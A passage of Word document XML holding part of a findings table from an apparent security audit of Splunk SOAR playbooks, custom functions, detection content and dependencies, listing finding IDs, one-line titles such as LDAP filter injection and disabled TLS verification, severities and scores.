              <w:t>Cisco Talos Untrusted verdict never maps to Malicious (unstrusted typo) - fail-open scoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ServiceNow sysparm_query (encoded query and URL parameter) injection via search_term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ES drilldown and risk-message $field$ tokens are substituted unquoted (1,971 detections; one uses |s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LDAP filter injection in AD LDAP Entity Attribute Lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Licence compliance gaps: GPL-3.0-derived datasets redistributed under Apache-2.0 without notices; no NOTICE file; build tool licence unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>asset_get_attributes returns the full asset configuration (possible secret exposure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hostname interpolated into PowerShell file paths in internal_host_winrm_investigate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>regex_extract_ipv4: unanchored regex extracts wrong or partial IPs used for security decisions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Object-reference inputs acted on without authorisation checks (artifact/indicator/evidence functions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>External tools launched via partial executable path (PATH hijack) in pre-commit hook and scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DSDL/MLTK notebooks deserialise models with pickle and torch.load on stale libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unpinned yamlfmt@latest, floating Go toolchain and sibling-directory executable probe in the pre-commit hook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>url_parse: unhandled ValueError on malformed port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk TA pins drift from Splunkbase and from each other (10 apps a major version behind)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TLS certificate verification disabled on SOAR REST calls (verify=False)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
